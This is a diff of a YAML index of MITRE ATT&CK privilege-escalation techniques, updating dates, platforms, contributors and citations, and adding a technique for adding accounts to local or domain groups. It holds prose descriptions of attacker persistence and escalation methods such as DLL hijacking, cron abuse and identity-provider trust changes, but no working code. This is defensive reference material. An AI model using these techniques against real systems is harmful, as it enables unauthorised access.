-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16068,12 +16330,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16148,12 +16409,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16173,9 +16433,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -16195,9 +16460,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -16214,6 +16478,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16247,7 +16515,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -16403,31 +16670,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16444,6 +16691,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -16454,9 +16702,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -16464,13 +16716,29 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16500,6 +16768,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -16510,6 +16779,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -16518,13 +16788,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -16566,9 +16836,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -16636,19 +16903,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -16664,8 +16930,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16679,7 +16945,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -16705,6 +16971,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -16732,12 +17002,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16763,7 +17032,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -16805,7 +17074,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -16883,11 +17151,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -16967,7 +17234,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -16990,7 +17327,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17038,8 +17375,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -17071,7 +17406,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -17126,13 +17461,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17193,9 +17526,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -17204,7 +17537,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -17257,7 +17589,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17278,12 +17610,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -17386,7 +17717,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -17486,12 +17816,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17504,7 +17833,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -17517,7 +17845,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -17547,7 +17874,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -17574,7 +17902,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17600,13 +17928,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17683,12 +18009,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17707,6 +18032,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -17714,7 +18040,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -17734,34 +18059,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -17797,6 +18124,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -17808,16 +18139,12 @@ privilege-escalation:
 
 
